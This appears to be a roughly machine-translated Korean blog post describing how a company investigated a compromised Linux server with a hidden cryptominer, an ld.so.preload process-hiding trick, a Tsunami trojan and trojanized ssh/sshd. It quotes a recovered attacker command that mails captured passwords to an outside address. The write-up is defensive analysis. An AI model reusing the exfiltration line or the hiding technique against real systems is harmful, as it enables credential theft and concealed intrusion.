막 새 회사에 입사했는데, 동료로부터 회사에 서버에서 광물 발굴 바이러스가 있다는 말을 들었는데, 당시에는 특별히 개의치 않았다

 xxx   yyy

1. 첫 접촉

날짜: x월 15일

아침에 서버 경보를 받았습니다./etc/passwd 파일이 수정되었습니다.
로그인 서버에host key 수정 알림 보이기;서버에last와history 기록이 비워졌는지 확인하기;/var/log/secure가 비워집니다./var/log/messages 비우기;.ssh/authorized_키에 알 수 없는pub 키가 추가되었습니다.
이상의 판단에 근거하여 서버가 침입되었다.
조치:

모든 서버와 관련된 암호 수정

sshpub key 제거

이상 프로세스 검사(미발견)

검사 정시 작업(발견되지 않음)

2. cpu 이용률이 높다는 것을 발견

날짜: x월 20일

여러 서버 cpuusr 이용률이 장기적으로 90% 이상인 것을 발견했습니다.

프로세스를 검사했지만 cpu가 높은 프로세스를 차지하는 것을 발견하지 못했다.

네트워크 연결을 검사한 결과 이상 연결이 발견되었지만 pid에 대응하지 않았습니다.

ESTAB      0      0      10.3.x.x:48002              1xx.2xx.1xx.1xx:443

채광 바이러스 프로그램에 걸렸고 진행 과정이 숨겨진 것으로 의심된다.

정상적인 서버에서 psnetstat 등 명령 파일을 복사하여 이 서버에서 실행한 후에도 프로세스를 볼 수 없습니다.

서버 파일 발견/etc/ld.so.preload, 이 파일에 이상한 so 파일이 불러오면 서버 명령(psetstat\top)에서 채광 프로세스를 볼 수 없고 이 파일을 삭제합니다.

프로세스를 다시 보니 채광 프로세스가'wipefs', 수동kill로 프로세스를 제거하고 cpu 이용률 회복

 ps -ef |grep wipefs
root      7025     1 99 Xxx 15 ?        19-10:42:00 /usr/lib64/-l/.db/wipefs --library-path /usr/lib64/-l/.db /usr/lib64/-l/.db/x

3. 비밀번호 찾기

날짜: x+1월 7일

서버에서 광산 발굴 프로그램wipefs를 실행하는 것을 발견했습니다

서버 로그 확인 관련 정보 다시 삭제

누락된 메시지 로그에서 어떤 테스트 서버를 제어하여 발판으로 삼았다

로그파일에 로그인 방식이 비밀번호로 기록되어 있어 한꺼번에 성공(이상하다. 폭력적인 해독이 없다)

심각한 상황을 고려하여 안전 모니터링 스크립트 배치

검색 결과

usr/lib/httpds: Win.Trojan.Tsunami-5 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6677493
Engine version: 0.100.1
Scanned directories: 11867
Scanned files: 95647
Infected files: 1
Data scanned: 7709.03 MB
Data read: 34049.43 MB (ratio 0.23:1)
Time: 3318.450 sec (55 m 18 s)

---------------------- Start Rootkit Hunter Scan ----------------------
Warning: Package manager verification has failed:
        File: /usr/sbin/sshd
        The file hash value has changed
        The file size has changed
        The file modification time has changed
Warning: Package manager verification has failed:
        File: /usr/bin/ssh
        The file hash value has changed
        The file size has changed
        The file modification time has changed

목마 바이러스에 걸렸고 대응cronjob와 프로세스

ssh와 sshd 모두 수정

sshd의 행위를 한층 더 분석:strace-p, 그리고 사용자 이름과 비밀번호로 로그인하는 테스트

#  mail  
echo pass_from: 10.3.x.x user:  xxx pass: yyyy |mail -s "Salut sefu, am moutati" [email protected]

비밀번호가 폭력적으로 해독되지 않고 왜 확보됐는지 찾았다.
그럼 프로톤메일.com 메일박스는 도대체 어떤 메일박스 시스템인가요?공식 소개를 보면 다음과 같은 두 가지를 요약할 수 있다. ProtonMail is incorporated in Switzerland and all our servers are located in Switzerland.This means all user data is protected by strict Swiss privacy laws. No personal information is required to create your secure email account. By default, we do not keep any IP logs which can be linked to your anonymous email account. Your privacy comes first. 기본적으로 침입자로 인정되는 필수 메일 시스템, 인터넷에서도 검색할 수 있는 협박 바이러스도 이 메일박스를 사용한다.
참조 문서https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/https://paper.seebug.org/629/

이 내용에 흥미가 있습니까?

현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:

다양한 언어의 JSON

JSON은 Javascript 표기법을 사용하여 데이터 구조를 레이아웃하는 데이터 형식입니다. 그러나 Javascript가 코드에서 이러한 구조를 나타낼 수 있는 유일한 언어는 아닙니다. 저는 일반적으로 '객체'{}...

텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.

CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.